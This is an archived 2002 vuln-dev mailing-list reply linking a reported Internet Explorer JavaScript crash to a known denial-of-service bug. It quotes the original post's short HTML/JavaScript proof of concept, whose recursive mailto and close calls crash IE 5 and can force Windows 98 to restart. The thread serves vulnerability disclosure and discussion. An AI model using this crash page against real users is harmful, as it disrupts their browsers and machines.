RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript.
From: Patrik Birgersson (float@aiasec.com)Date: 06/03/02
- Previous message: Nicolas Sigal: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- In reply to: Thor Larholm: "RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 3 Jun 2002 23:17:33 +0200 (CEST) From: Patrik Birgersson <float@aiasec.com> To: vuln-dev@securityfocus.com
This seems quite familiar to the "Multiple Vendor JavaScript Interpreter
Denial Of Service Vulnerability" reported to Bugtraq in march.
http://online.securityfocus.com/bid/4322
Patrik Birgersson
> -----Original Message-----
> From: Matias Sedalo [mailto:s0t4ipv6@shellcode.com.ar]
> Sent: 2. juni 2002 23:08
> To: vuln-dev@securityfocus.com
> Subject: Buffer Overflow with all versions of Internet Explorer and
> Javacript.
>
>
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition. As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
> var company;
>
> crear();
> address="s0t4ipv6@shellcode.com.ar";
> soporte();
> }
> function soporte(){
> var soporte="bill@mocosoft.com";
> window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
> // window.location=company; // also this line cause the bof.
> close(hacerMail());
> }
> function crear(){
> company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet es perjudicial para la salud -
> - Ley N~ 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6@shellcode.com.ar
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> ........................................
- Previous message: Nicolas Sigal: "Re: Buffer Overflow with all versions of Internet Explorer and Javacript."
- In reply to: Thor Larholm: "RE: Buffer Overflow with all versions of Internet Explorer and Ja vacript."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
